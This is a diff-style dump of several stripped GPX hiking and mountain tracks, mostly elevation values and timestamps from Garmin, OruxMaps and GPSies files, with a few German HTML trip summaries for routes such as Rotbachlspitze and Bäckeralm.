+2015-01-18T14:23:04Z
+
+
+1408.47
+2015-01-18T14:24:11Z
+
+
+1393.57
+2015-01-18T14:25:17Z
+
+
+1388.28
+2015-01-18T14:26:00Z
+
+
+1383.47
+2015-01-18T14:27:45Z
+ "
+"
+
+
+
+
+
+
+2015-06-27T14:57:26Z
+
+
+Traccia corrente: 27 GIU 2015 08:21
+Traccia corrente: 27 GIU 2015 08:21
+
+
+
+1233.98999
+2015-06-27T06:21:37Z
+
+
+1229.179932
+2015-06-27T06:25:58Z
+
+
+1231.589966
+2015-06-27T06:27:12Z
+
+
+1252.740112
+2015-06-27T06:31:59Z
+
+
+1269.080078
+2015-06-27T06:33:50Z
+
+
+1281.090088
+2015-06-27T06:35:01Z
+
+
+1293.589966
+2015-06-27T06:36:07Z
+
+
+1315.699951
+2015-06-27T06:38:22Z
+
+
+1325.799927
+2015-06-27T06:39:23Z
+
+
+1332.52002
+2015-06-27T06:40:06Z
+
+
+1354.150024
+2015-06-27T06:42:36Z
+
+
+1359.919922
+2015-06-27T06:43:17Z
+
+
+1364.72998
+2015-06-27T06:43:45Z
+
+
+1390.680054
+2015-06-27T06:46:35Z
+
+
+1395.969971
+2015-06-27T06:47:20Z
+
+
+1406.550049
+2015-06-27T06:48:17Z
+
+
+1414.719971
+2015-06-27T06:49:00Z
+
+
+1428.179932
+2015-06-27T06:50:26Z
+
+
+1437.789917
+2015-06-27T06:51:25Z
+
+
+1447.880127
+2015-06-27T06:52:42Z
+
+
+1457.02002
+2015-06-27T06:54:18Z
+
+
+1470.469971
+2015-06-27T06:55:39Z
+
+
+1489.220093
+2015-06-27T06:57:35Z
+
+
+1498.350098
+2015-06-27T06:58:41Z
+
+
+1527.669922
+2015-06-27T07:02:24Z
+
+
+1554.589966
+2015-06-27T07:05:17Z
+
+
+1567.090088
+2015-06-27T07:06:32Z
+
+
+1573.820068
+2015-06-27T07:07:13Z
+
+
+1599.290039
+2015-06-27T07:10:39Z
+
+
+1619.960083
+2015-06-27T07:13:53Z
+
+
+1629.570068
+2015-06-27T07:14:53Z
+
+
+1648.319946
+2015-06-27T07:16:47Z
+
+
+1658.409912
+2015-06-27T07:17:48Z
+
+
+1692.539917
+2015-06-27T07:23:55Z
+
+
+1720.419922
+2015-06-27T07:27:06Z
+
+
+1722.819946
+2015-06-27T07:27:21Z
+
+
+1731.469971
+2015-06-27T07:28:22Z
+
+
+1733.390015
+2015-06-27T07:28:37Z
+
+
+1746.369995
+2015-06-27T07:30:30Z
+
+
+1758.869995
+2015-06-27T07:32:56Z
+
+
+1763.679932
+2015-06-27T07:33:27Z
+
+
+1776.170044
+2015-06-27T07:34:44Z
+
+
+1782.900024
+2015-06-27T07:35:26Z
+
+
+1787.230103
+2015-06-27T07:35:55Z
+
+
+1808.380005
+2015-06-27T07:38:13Z
+
+
+1819.429932
+2015-06-27T07:39:23Z
+
+
+1870.859985
+2015-06-27T07:45:18Z
+
+
+1878.069946
+2015-06-27T07:51:46Z
+
+
+1881.440063
+2015-06-27T07:56:28Z
+
+
+1910.280029
+2015-06-27T08:00:40Z
+
+
+1912.679932
+2015-06-27T08:01:02Z
+
+
+1924.699951
+2015-06-27T08:02:18Z
+
+
+1946.809937
+2015-06-27T08:04:43Z
+
+
+1958.339966
+2015-06-27T08:06:07Z
+
+
+1960.27002
+2015-06-27T08:06:24Z
+
+
+1980.450073
+2015-06-27T08:08:49Z
+
+
+1998.239868
+2015-06-27T08:12:14Z
+
+
+2022.27002
+2015-06-27T08:15:21Z
+
+
+2040.540039
+2015-06-27T08:23:27Z
+
+
+2100.139893
+2015-06-27T08:31:05Z
+
+
+2106.390137
+2015-06-27T08:31:51Z
+
+
+2124.169922
+2015-06-27T08:33:51Z
+
+
+2203.47998
+2015-06-27T08:43:25Z
+
+
+2211.649902
+2015-06-27T08:44:25Z
+
+
+2215.5
+2015-06-27T08:45:06Z
+
+
+2285.670166
+2015-06-27T08:52:58Z
+
+
+2300.570068
+2015-06-27T08:54:43Z
+
+
+2333.26001
+2015-06-27T08:58:27Z
+
+
+2356.810059
+2015-06-27T09:01:36Z
+
+
+2368.350098
+2015-06-27T09:02:54Z
+
+
+2378.439941
+2015-06-27T09:04:03Z
+
+
+2410.159912
+2015-06-27T09:08:51Z
+
+
+2426.98999
+2015-06-27T09:13:43Z
+ "
+"
+
+
+
+
+
+
+Garmin International
+2017-01-08T14:40:48Z
+
+
+2017-01-08 13:12:01
+
+
+
+
+
+
+
+
+572.62
+2017-01-08T11:50:13Z
+
+
+574.14
+2017-01-08T11:52:28Z
+
+
+579.98
+2017-01-08T11:53:12Z
+
+
+586.08
+2017-01-08T11:55:07Z
+
+
+585.81
+2017-01-08T11:55:20Z
+
+
+584.96
+2017-01-08T11:55:56Z
+
+
+576.87
+2017-01-08T11:57:35Z
+
+
+581.76
+2017-01-08T12:00:57Z
+
+
+579.32
+2017-01-08T12:05:18Z
+
+
+580.91
+2017-01-08T12:06:21Z
+
+
+579.57
+2017-01-08T12:08:02Z
+
+
+568.52
+2017-01-08T12:09:10Z
+
+
+557.35
+2017-01-08T12:11:14Z
+
+
+555.58
+2017-01-08T12:11:32Z
+
+
+538.07
+2017-01-08T12:11:58Z
+ "
+"
+
+
+
+
+
+
+
+FInish
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ "
+"
+
+
+
+
+
+
+Garmin International
+2016-09-26T06:08:25Z
+
+
+2016-09-25-01
+
+
+
+
+
+
+1459.6
+2016-09-25T07:14:49Z
+
+
+1458.9
+2016-09-25T07:16:46Z
+
+
+1474.5
+2016-09-25T07:17:46Z
+
+
+1473.9
+2016-09-25T07:18:29Z
+
+
+1461.0
+2016-09-25T07:19:43Z
+
+
+1468.6
+2016-09-25T07:20:53Z
+
+
+1470.2
+2016-09-25T07:22:32Z
+
+
+1476.8
+2016-09-25T07:23:21Z
+
+
+1488.8
+2016-09-25T07:24:18Z
+
+
+1515.8
+2016-09-25T07:26:13Z
+
+
+1542.4
+2016-09-25T07:29:05Z
+
+
+1546.9
+2016-09-25T07:31:58Z
+
+
+1535.6
+2016-09-25T07:33:21Z
+
+
+1549.7
+2016-09-25T07:34:47Z
+
+
+1566.5
+2016-09-25T07:37:13Z
+
+
+1576.2
+2016-09-25T07:39:18Z
+
+
+1579.7
+2016-09-25T07:40:03Z
+
+
+1588.5
+2016-09-25T07:40:52Z
+
+
+1617.0
+2016-09-25T07:43:21Z
+
+
+1629.8
+2016-09-25T07:44:24Z
+
+
+1637.5
+2016-09-25T07:45:12Z
+
+
+1638.8
+2016-09-25T07:45:33Z
+
+
+1647.3
+2016-09-25T07:46:37Z
+
+
+1655.8
+2016-09-25T07:47:27Z
+
+
+1665.1
+2016-09-25T07:51:39Z
+
+
+1674.9
+2016-09-25T07:52:32Z
+
+
+1687.5
+2016-09-25T07:54:20Z
+
+
+1647.1
+2016-09-25T07:56:21Z
+
+
+1644.1
+2016-09-25T07:57:04Z
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ "
+"
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ "
+"
+
+
+
+
+
+
+
+Omey
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ "
+"
+
+
+roggen 2018-01
+
+
+
+
+
+
+
+
+
+500.2000537471803
+
+
+507.0000372607535
+
+
+525.4000081437339
+
+
+552.0000671138458
+
+
+584.4000074571355
+
+
+591.0999709265405
+
+
+596.4000003165072
+
+
+603.8000700615019
+
+
+610.5000817538462
+
+
+617.4998644022367
+
+
+623.7
+
+
+628.4999184338776
+
+
+632.5000354182092
+
+
+648.761062680733
+
+
+664.4999770694059
+
+
+677.100152934708
+
+
+695.2
+
+
+701.3998504637382
+
+
+730.2
+
+
+739.2000106933872
+
+
+749.7001396319287
+
+
+773.2001124822964
+
+
+814.7
+
+
+846.3999335018326
+
+
+854.700051224318
+
+
+868.2000156174431
+
+
+892.8000788952016
+
+
+933.1998983347236
+
+
+974.4998882026714
+
+
+996.8000007621342
+
+
+997.2999977339209
+
+
+996.5999620793926
+
+
+949.6000942589088
+
+
+942.3999616629795
+
+
+928.5
+
+
+908.7999675274789
+
+
+883.599961448275
+
+
+869.8000211773698
+
+
+849.2
+
+
+838.0999641336422
+
+
+830.6000172968124
+
+
+827.5000191384531
+
+
+822.8639637906598
+
+
+817.6999375798724
+
+
+805.3511480938297
+
+
+802.4969279289819
+
+
+803.099999585324
+
+
+803.4999285897027
+
+
+797.2998902786918
+
+
+787.2999316327728
+
+
+777.300025215549
+
+
+752.7999958473797
+
+
+741.600015643222
+
+
+744.5000248419298
+
+
+758.0999897091766
+
+
+761.599996610942
+
+
+769.5999774041952
+
+
+764.2037642222323
+
+
+755.8999968813548
+
+
+751.4999998764393
+
+
+740.200069766434
+
+
+681.999989968073
+
+
+673.1984843489736
+
+
+664.3
+
+
+642.800028274461
+
+
+626.0
+
+
+613.3000135409167
+
+
+593.800085943625
+
+
+587.80004219378
+
+
+575.0
+
+
+552.8000400157371
+
+
+525.4000081435004
+
+
+507.00003726053416
+
+
+500.1000539543323
+ "
+"
+
+
+Rotbachlspitze
+
+
+
+
+
+OruxMaps
+2015-09-10T05:53:21Z
+
+
+Rotbachlspitze
+<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Name: Rotbachlspitze</h2><br /><p>Startzeit: 09/10/2015 07:53</p><p>Zielzeit: 09/10/2015 11:08</p><p>Strecke: 4,6km (03:15)</p><p>Bewegungszeit: 01:39</p><p>Ø-Geschwindigkeit: 1,4km/h</p><p>Netto-Geschwindigkeit: 2,8km/h</p><p>Max. Geschwindigkeit: 5,3km/h</p><p>Minimale Höhe: 1772m</p><p>Maximale Höhe: 2893m</p><p>Steig-Geschw.: 353,5m/h</p><p>Sink-Geschw.: -151,9m/h</p><p>Aufstieg: 1096m</p><p>Abstieg: -9m</p><p>Steigzeit: 03:06</p><p>Sinkzeit: 00:03</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/>
+
+Unbestimmt
+
+
+
+
+
+1772.24
+2015-09-10T05:53:21Z
+
+
+1773.31
+2015-09-10T05:53:31Z
+
+
+1805.26
+2015-09-10T06:04:53Z
+
+
+1790.99
+2015-09-10T06:14:14Z
+
+
+1829.36
+2015-09-10T06:19:36Z
+
+
+1853.75
+2015-09-10T06:21:54Z
+
+
+1859.41
+2015-09-10T06:24:15Z
+
+
+1876.74
+2015-09-10T06:26:11Z
+
+
+1891.77
+2015-09-10T06:27:12Z
+
+
+1936.24
+2015-09-10T06:31:38Z
+
+
+1951.09
+2015-09-10T06:32:42Z
+
+
+1969.04
+2015-09-10T06:34:05Z
+
+
+1968.34
+2015-09-10T06:34:47Z
+
+
+1984.21
+2015-09-10T06:36:36Z
+
+
+2000.12
+2015-09-10T06:38:18Z
+
+
+2029.24
+2015-09-10T06:42:09Z
+
+
+2052.24
+2015-09-10T06:44:45Z
+
+
+2057.03
+2015-09-10T06:46:15Z
+
+
+2089.22
+2015-09-10T06:49:30Z
+
+
+2119.12
+2015-09-10T06:55:43Z
+
+
+2147.59
+2015-09-10T06:58:29Z
+
+
+2166.37
+2015-09-10T07:00:44Z
+
+
+2186.24
+2015-09-10T07:03:15Z
+
+
+2194.97
+2015-09-10T07:04:29Z
+
+
+2208.67
+2015-09-10T07:06:10Z
+
+
+2214.24
+2015-09-10T07:07:07Z
+
+
+2225.71
+2015-09-10T07:09:37Z
+
+
+2245.12
+2015-09-10T07:11:10Z
+
+
+2244.68
+2015-09-10T07:11:26Z
+
+
+2256.25
+2015-09-10T07:15:15Z
+
+
+2264.74
+2015-09-10T07:19:00Z
+
+
+2275.86
+2015-09-10T07:21:50Z
+
+
+2290.12
+2015-09-10T07:23:29Z
+
+
+2313.24
+2015-09-10T07:28:14Z
+
+
+2345.24
+2015-09-10T07:31:57Z
+
+
+2346.75
+2015-09-10T07:32:38Z
+
+
+2352.21
+2015-09-10T07:33:21Z
+
+
+2376.24
+2015-09-10T07:42:39Z
+
+
+2371.75
+2015-09-10T07:43:32Z
+
+
+2377.21
+2015-09-10T07:44:49Z
+
+
+2383.24
+2015-09-10T07:56:27Z
+
+
+2395.75
+2015-09-10T07:58:19Z
+
+
+2429.25
+2015-09-10T08:02:18Z
+
+
+2451.72
+2015-09-10T08:05:17Z
+
+
+2463.41
+2015-09-10T08:06:44Z
+
+
+2467.37
+2015-09-10T08:08:35Z
+
+
+2484.59
+2015-09-10T08:10:14Z
+
+
+2489.74
+2015-09-10T08:11:36Z
+
+
+2488.74
+2015-09-10T08:12:11Z
+
+
+2511.61
+2015-09-10T08:13:56Z
+
+
+2518.11
+2015-09-10T08:14:41Z
+
+
+2532.83
+2015-09-10T08:16:47Z
+
+
+2546.78
+2015-09-10T08:18:14Z
+
+
+2567.98
+2015-09-10T08:20:05Z
+
+
+2576.24
+2015-09-10T08:20:48Z
+
+
+2587.25
+2015-09-10T08:23:28Z
+
+
+2587.78
+2015-09-10T08:25:37Z
+
+
+2587.6
+2015-09-10T08:26:26Z
+
+
+2664.74
+2015-09-10T08:37:54Z
+
+
+2713.73
+2015-09-10T08:43:53Z
+
+
+2787.68
+2015-09-10T08:53:33Z
+
+
+2874.23
+2015-09-10T09:05:58Z
+
+
+2891.24
+2015-09-10T09:07:45Z
+
+
+2893.37
+2015-09-10T09:08:36Z
+ "
+"
+
+
+
+
+
+
+Garmin International
+2014-02-27T14:29:58Z
+
+2014-02-27 15:29:57
+
+
+
+
+
+
+1600.96
+2014-02-27T13:03:23Z
+
+
+1602.44
+2014-02-27T13:05:47Z
+
+
+1607.29
+2014-02-27T13:07:11Z
+
+
+1612.1
+2014-02-27T13:08:35Z
+
+
+1620.79
+2014-02-27T13:12:02Z
+
+
+1626.95
+2014-02-27T13:15:47Z
+
+
+1630.36
+2014-02-27T13:19:52Z
+
+
+1642.08
+2014-02-27T13:25:14Z
+
+
+1651.43
+2014-02-27T13:27:03Z
+
+
+1654.47
+2014-02-27T13:28:42Z
+
+
+1651.29
+2014-02-27T13:30:32Z
+
+
+1651.77
+2014-02-27T13:31:41Z
+
+
+1653.41
+2014-02-27T13:33:06Z
+
+
+1655.33
+2014-02-27T13:34:22Z
+
+
+1668.44
+2014-02-27T13:36:54Z
+
+
+1670.06
+2014-02-27T13:37:15Z
+
+
+1675.36
+2014-02-27T13:38:25Z
+
+
+1682.31
+2014-02-27T13:40:31Z
+
+
+1690.06
+2014-02-27T13:42:05Z
+
+
+1691.84
+2014-02-27T13:42:39Z
+
+
+1693.76
+2014-02-27T13:43:19Z
+
+
+1686.52
+2014-02-27T13:44:18Z
+
+
+1679.2
+2014-02-27T13:45:27Z
+
+
+1659.41
+2014-02-27T13:49:40Z
+
+
+1643.77
+2014-02-27T13:51:26Z
+
+
+1639.27
+2014-02-27T13:52:16Z
+
+
+1630.9
+2014-02-27T13:52:58Z
+
+
+1623.53
+2014-02-27T13:57:42Z
+
+
+1625.39
+2014-02-27T13:58:49Z
+
+
+1617.64
+2014-02-27T13:59:48Z
+
+
+1602.29
+2014-02-27T14:01:53Z
+
+
+1603.18
+2014-02-27T14:03:50Z
+
+
+1602.28
+2014-02-27T14:05:16Z
+
+
+1602.17
+2014-02-27T14:06:11Z
+
+
+1603.99
+2014-02-27T14:07:16Z
+
+
+1604.26
+2014-02-27T14:08:14Z
+
+
+1605.6
+2014-02-27T14:09:31Z
+
+
+1607.63
+2014-02-27T14:11:50Z
+
+
+1607.85
+2014-02-27T14:12:09Z
+
+
+1609.88
+2014-02-27T14:13:11Z
+
+
+1611.14
+2014-02-27T14:13:40Z
+
+
+1614.1
+2014-02-27T14:15:04Z
+
+
+1615.2
+2014-02-27T14:17:14Z
+
+
+1614.44
+2014-02-27T14:18:02Z
+
+
+1615.01
+2014-02-27T14:18:13Z
+
+
+1612.34
+2014-02-27T14:19:54Z
+
+
+1614.54
+2014-02-27T14:20:25Z
+
+
+1613.43
+2014-02-27T14:21:51Z
+
+
+1615.07
+2014-02-27T14:22:24Z
+
+
+1616.45
+2014-02-27T14:22:58Z
+
+
+1616.53
+2014-02-27T14:23:42Z
+
+
+1612.2
+2014-02-27T14:26:02Z
+
+
+1607.53
+2014-02-27T14:27:39Z
+
+
+1606.73
+2014-02-27T14:29:56Z
+ "
+"
+
+
+
+
+
+
+Garmin International
+2017-07-31T12:35:52Z
+
+2017-07-31 14:35:48
+
+
+
+
+
+1939.6
+2017-07-31T06:57:18Z
+
+
+2059.76
+2017-07-31T07:01:51Z
+
+
+2064.57
+2017-07-31T07:04:02Z
+
+
+2093.89
+2017-07-31T07:07:23Z
+
+
+2126.57
+2017-07-31T07:11:15Z
+
+
+2147.24
+2017-07-31T07:13:26Z
+
+
+2169.83
+2017-07-31T07:15:37Z
+
+
+2300.09
+2017-07-31T07:30:39Z
+
+
+2317.88
+2017-07-31T07:34:16Z
+
+
+2329.89
+2017-07-31T07:37:17Z
+
+
+2350.56
+2017-07-31T07:39:36Z
+
+
+2492.84
+2017-07-31T07:58:51Z
+
+
+2517.83
+2017-07-31T08:02:22Z
+
+
+2550.51
+2017-07-31T08:05:57Z
+
+
+2602.91
+2017-07-31T08:15:18Z
+
+
+2634.15
+2017-07-31T08:20:13Z
+
+
+2679.33
+2017-07-31T08:26:02Z
+
+
+2709.61
+2017-07-31T08:29:31Z
+
+
+2717.3
+2017-07-31T08:34:00Z
+
+
+2689.91
+2017-07-31T08:38:27Z
+
+
+2710.57
+2017-07-31T08:41:37Z
+
+
+2746.14
+2017-07-31T08:46:34Z
+
+
+2788.44
+2017-07-31T08:51:50Z
+
+
+2824.01
+2017-07-31T08:56:15Z
+
+
+2859.58
+2017-07-31T09:01:43Z
+
+
+2895.63
+2017-07-31T09:07:17Z
+
+
+2925.43
+2017-07-31T09:15:36Z
+
+
+2987.43
+2017-07-31T09:24:39Z
+
+
+3047.52
+2017-07-31T09:36:04Z
+
+
+3085.97
+2017-07-31T09:42:36Z
+
+
+3047.04
+2017-07-31T10:23:11Z
+
+
+3007.14
+2017-07-31T10:27:36Z
+
+
+2986.47
+2017-07-31T10:31:43Z
+
+
+2957.63
+2017-07-31T10:38:25Z
+
+
+2908.61
+2017-07-31T10:48:17Z
+
+
+2870.63
+2017-07-31T10:53:35Z
+
+
+2841.79
+2017-07-31T10:59:50Z
+
+
+2758.64
+2017-07-31T11:08:28Z
+
+
+2735.57
+2017-07-31T11:12:02Z
+
+
+2714.42
+2017-07-31T11:19:06Z
+
+
+2700.96
+2017-07-31T11:29:38Z
+
+
+2668.28
+2017-07-31T11:32:01Z
+
+
+2595.7
+2017-07-31T11:40:17Z
+
+
+2537.06
+2017-07-31T11:47:12Z
+
+
+2418.81
+2017-07-31T11:58:59Z
+
+
+2356.81
+2017-07-31T12:05:31Z
+
+
+2339.51
+2017-07-31T12:07:26Z
+
+
+2278.46
+2017-07-31T12:10:16Z
+
+
+2265.96
+2017-07-31T12:15:38Z
+
+
+2192.42
+2017-07-31T12:21:55Z
+
+
+2165.03
+2017-07-31T12:23:42Z
+
+
+2125.61
+2017-07-31T12:26:41Z
+
+
+2110.23
+2017-07-31T12:28:02Z
+
+
+2081.87
+2017-07-31T12:30:28Z
+
+
+2069.38
+2017-07-31T12:32:04Z
+ "
+"
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ "
+"
+
+
+Bäckeralm
+
+Joachim Lucht - Community
+
+
+
+2016-01-01T14:04:53Z
+
+Bäckeralm
+
+
+
+797.2
+
+
+792.7
+
+
+784.6
+
+
+777.0
+
+
+794.7
+
+
+809.4
+
+
+814.3
+
+
+834.1
+
+
+856.5
+
+
+870.5
+
+
+883.5
+
+
+913.0
+
+
+952.5
+
+
+968.1
+
+
+973.5
+
+
+998.3
+
+
+1003.1
+
+
+1019.0
+
+
+1025.3
+
+
+1039.8
+
+
+1060.2
+
+
+1068.8
+
+
+1077.9
+
+
+1082.2
+
+
+1100.1
+
+
+1105.2
+
+
+1102.9
+
+
+1087.4
+
+
+1074.7
+
+
+1062.8
+
+
+1074.7
+
+
+1087.4
+
+
+1071.7
+
+
+1062.7
+
+
+1034.0
+
+
+1020.9
+
+
+1018.6
+
+
+1020.2
+
+
+1011.9
+
+
+1001.7
+
+
+966.2
+
+
+956.7
+
+
+957.2
+
+
+951.7
+
+
+957.6
+
+
+927.8
+
+
+933.4
+
+
+931.2
+
+
+924.0
+
+
+896.2
+
+
+889.2
+
+
+881.6
+
+
+876.5
+
+
+847.3
+
+
+826.8
+
+
+819.7
+
+
+819.0
+
+
+810.5
+
+
+800.8
+
+
+805.5
+
+
+805.5
+
+
+800.7
+
+
+794.7
+
+
+777.0
+
+
+775.3
+
+
+784.6
+
+
+792.7
+
+
+797.2
+ "
+"
+
+
+2016-10-06 11:28
+
+
+
+
+
+OruxMaps
+2016-10-06T09:28:46Z
+
+
+2016-10-06 11:28
+<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Name: 2016-10-06 11:28</h2><br /><p>Startzeit: 10/06/2016 11:28</p><p>Zielzeit: 10/06/2016 12:52</p><p>Strecke: 3,7km (01:23)</p><p>Bewegungszeit: 00:53</p><p>Ø-Geschwindigkeit: 2,7km/h</p><p>Netto-Geschwindigkeit: 4,1km/h</p><p>Max. Geschwindigkeit: 7,8km/h</p><p>Minimale Höhe: 2199m</p><p>Maximale Höhe: 2847m</p><p>Steig-Geschw.: 522,1m/h</p><p>Sink-Geschw.: -295,5m/h</p><p>Aufstieg: 657m</p><p>Abstieg: -18m</p><p>Steigzeit: 01:15</p><p>Sinkzeit: 00:03</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/>
+
+Unbestimmt
+
+
+
+
+
+2199.44
+2016-10-06T09:28:48Z
+
+
+2208.45
+2016-10-06T09:30:57Z
+
+
+2208.56
+2016-10-06T09:32:46Z
+
+
+2227.69
+2016-10-06T09:36:44Z
+
+
+2231.76
+2016-10-06T09:37:31Z
+
+
+2246.64
+2016-10-06T09:39:11Z
+
+
+2251.84
+2016-10-06T09:41:07Z
+
+
+2273.23
+2016-10-06T09:42:28Z
+
+
+2269.79
+2016-10-06T09:43:10Z
+
+
+2293.91
+2016-10-06T09:45:52Z
+
+
+2323.65
+2016-10-06T09:49:19Z
+
+
+2322.04
+2016-10-06T09:49:38Z
+
+
+2342.91
+2016-10-06T09:53:12Z
+
+
+2357.47
+2016-10-06T09:55:03Z
+
+
+2351.27
+2016-10-06T09:55:30Z
+
+
+2357.34
+2016-10-06T09:56:56Z
+
+
+2365.03
+2016-10-06T09:57:44Z
+
+
+2380.42
+2016-10-06T10:00:08Z
+
+
+2389.95
+2016-10-06T10:01:25Z
+
+
+2400.36
+2016-10-06T10:02:35Z
+
+
+2404.81
+2016-10-06T10:03:46Z
+
+
+2416.79
+2016-10-06T10:06:33Z
+
+
+2442.94
+2016-10-06T10:08:15Z
+
+
+2482.28
+2016-10-06T10:10:55Z
+
+
+2489.94
+2016-10-06T10:11:41Z
+
+
+2496.11
+2016-10-06T10:12:48Z
+
+
+2507.08
+2016-10-06T10:14:47Z
+
+
+2523.35
+2016-10-06T10:15:34Z
+
+
+2524.78
+2016-10-06T10:17:12Z
+
+
+2525.81
+2016-10-06T10:17:51Z
+
+
+2533.32
+2016-10-06T10:19:04Z
+
+
+2565.94
+2016-10-06T10:21:00Z
+
+
+2609.29
+2016-10-06T10:25:25Z
+
+
+2642.94
+2016-10-06T10:29:07Z
+
+
+2649.94
+2016-10-06T10:31:28Z
+
+
+2671.4
+2016-10-06T10:33:00Z
+
+
+2703.78
+2016-10-06T10:37:24Z
+
+
+2730.48
+2016-10-06T10:40:46Z
+
+
+2776.85
+2016-10-06T10:44:41Z
+
+
+2826.26
+2016-10-06T10:50:08Z
+
+
+2847.53
+2016-10-06T10:52:25Z
+ "
+"
+
+
+Speicher - P. 1001 - Teufen
+
+fuemm63
+
+fuemm63 on GPSies.com
+GPSiesUserOnWeb
+
+
+Speicher - P. 1001 - Teufen on GPSies.com
+trackOnWeb
+2015-09-16T16:51:51Z
+
+one-way trip
+177.0
+6216.320946798513
+835.0
+1066.0
+296.0
+
+Speicher - P. 1001 - Teufen on GPSies.com
+
+trackOnWeb
+
+
+958.0
+2010-01-01T00:00:00Z
+
+
+959.0
+2010-01-01T00:00:15Z
+
+
+960.0
+2010-01-01T00:00:38Z
+
+
+974.0
+2010-01-01T00:01:32Z
+
+
+1011.0
+2010-01-01T00:02:55Z
+
+
+1012.0
+2010-01-01T00:03:18Z
+
+
+1022.0
+2010-01-01T00:03:51Z
+
+
+1041.0
+2010-01-01T00:04:46Z
+
+
+1051.0
+2010-01-01T00:05:29Z
+
+
+1050.0
+2010-01-01T00:05:38Z
+
+
+1055.0
+2010-01-01T00:06:42Z
+
+
+1065.0
+2010-01-01T00:07:45Z
+
+
+1061.0
+2010-01-01T00:08:08Z
+
+
+1052.0
+2010-01-01T00:08:52Z
+
+
+1034.0
+2010-01-01T00:09:22Z
+
+
+1001.0
+2010-01-01T00:10:18Z
+
+
+1004.0
+2010-01-01T00:12:12Z
+
+
+1029.0
+2010-01-01T00:13:04Z
+
+
+1029.0
+2010-01-01T00:13:26Z
+
+
+1013.0
+2010-01-01T00:14:20Z
+
+
+996.0
+2010-01-01T00:15:51Z
+
+
+981.0
+2010-01-01T00:16:42Z
+
+
+977.0
+2010-01-01T00:17:00Z
+
+
+978.0
+2010-01-01T00:17:14Z
+
+
+984.0
+2010-01-01T00:17:46Z
+
+
+996.0
+2010-01-01T00:18:32Z
+
+
+993.0
+2010-01-01T00:19:21Z
+
+
+998.0
+2010-01-01T00:19:56Z
+
+
+991.0
+2010-01-01T00:20:23Z
+
+
+992.0
+2010-01-01T00:20:59Z
+
+
+993.0
+2010-01-01T00:21:14Z
+
+
+995.0
+2010-01-01T00:22:11Z
+
+
+998.0
+2010-01-01T00:22:36Z
+
+
+1000.0
+2010-01-01T00:23:10Z
+
+
+1000.0
+2010-01-01T00:23:46Z
+
+
+999.0
+2010-01-01T00:24:01Z
+
+
+993.0
+2010-01-01T00:25:48Z
+
+
+984.0
+2010-01-01T00:27:25Z
+
+
+972.0
+2010-01-01T00:28:57Z
+
+
+959.0
+2010-01-01T00:29:37Z
+
+
+961.0
+2010-01-01T00:29:44Z
+
+
+961.0
+2010-01-01T00:29:49Z
+
+
+960.0
+2010-01-01T00:30:18Z
+
+
+956.0
+2010-01-01T00:30:34Z
+
+
+947.0
+2010-01-01T00:30:48Z
+
+
+931.0
+2010-01-01T00:31:14Z
+
+
+921.0
+2010-01-01T00:31:36Z
+
+
+901.0
+2010-01-01T00:32:13Z
+
+
+889.0
+2010-01-01T00:32:35Z
+
+
+878.0
+2010-01-01T00:32:57Z
+
+
+858.0
+2010-01-01T00:33:49Z
+
+
+856.0
+2010-01-01T00:34:03Z
+
+
+852.0
+2010-01-01T00:34:37Z
+
+
+853.0
+2010-01-01T00:34:50Z
+
+
+851.0
+2010-01-01T00:35:00Z
+
+
+844.0
+2010-01-01T00:35:26Z
+
+
+835.0
+2010-01-01T00:36:03Z
+
+
+841.0
+2010-01-01T00:36:49Z
+
+
+840.0
+2010-01-01T00:37:02Z
+
+
+839.0
+2010-01-01T00:37:17Z
+ "
+"
+
+
+
+
+
+
+Garmin International
+2015-07-01T06:48:29Z
+
+
+susten
+
+
+
+
+
+
+1524.04
+2015-06-30T08:12:17Z
+
+
+1524.38
+2015-06-30T08:13:28Z
+
+
+1526.03
+2015-06-30T08:14:23Z
+
+
+1527.04
+2015-06-30T08:14:39Z
+
+
+1546.25
+2015-06-30T08:16:39Z
+
+
+1557.01
+2015-06-30T08:18:20Z
+
+
+1570.52
+2015-06-30T08:20:15Z
+
+
+1577.94
+2015-06-30T08:21:45Z
+
+
+1604.29
+2015-06-30T08:26:41Z
+
+
+1622.4
+2015-06-30T08:28:47Z
+
+
+1626.01
+2015-06-30T08:30:02Z
+
+
+1648.99
+2015-06-30T08:33:41Z
+
+
+1657.64
+2015-06-30T08:35:01Z
+
+
+1700.26
+2015-06-30T08:40:43Z
+
+
+1713.34
+2015-06-30T08:43:28Z
+
+
+1734.89
+2015-06-30T08:47:40Z
+
+
+1751.44
+2015-06-30T08:50:53Z
+
+
+1801.61
